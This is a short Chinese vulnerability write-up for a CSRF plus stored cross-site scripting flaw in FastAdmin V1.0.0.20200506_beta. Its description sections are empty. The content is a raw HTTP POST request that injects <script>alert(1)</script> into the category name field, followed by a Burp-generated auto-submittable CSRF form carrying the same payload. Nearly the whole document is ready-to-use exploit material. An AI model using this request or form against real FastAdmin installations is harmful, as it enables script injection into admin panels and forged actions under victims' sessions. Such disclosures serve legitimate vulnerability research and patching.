FastAdmin csrf+存储型xss漏洞¶
一、漏洞简介¶
二、漏洞影响¶
V1.0.0.20200506_beta
三、复现过程¶
POST /admin.php/category/add?dialog=1 HTTP/1.1
Host: www.0-sec.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Origin: https://www.0-sec.org
Connection: close
Referer: http://admin.com/admin.php/category/add?dialog=1
Cookie: PHPSESSID=ou6fjfn717lu02rfm9saqguca4; uid=3; token=f824ac8c-ac7b-4979-a89b-b47dd8e79226
row%5Btype%5D=default&row%5Bpid%5D=0&row%5Bname%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&row%5Bnickname%5D=123&row%5Bimage%5D=1&row%5Bkeywords%5D=123&row%5Bdescription%5D=123&row%5Bweigh%5D=0&row%5Bstatus%5D=normal&row%5Bflag%5D%5B%5D=
csrf poc¶
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.0-sec.org/admin.php/category/add?dialog=1" method="POST">
<input type="hidden" name="row[type]" value="default" />
<input type="hidden" name="row[pid]" value="0" />
<input type="hidden" name="row[name]" value="<script>alert(1)</script>" />
<input type="hidden" name="row[nickname]" value="123" />
<input type="hidden" name="row[image]" value="1" />
<input type="hidden" name="row[keywords]" value="123" />
<input type="hidden" name="row[description]" value="123" />
<input type="hidden" name="row[weigh]" value="0" />
<input type="hidden" name="row[status]" value="normal" />
<input type="hidden" name="row[flag][]" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
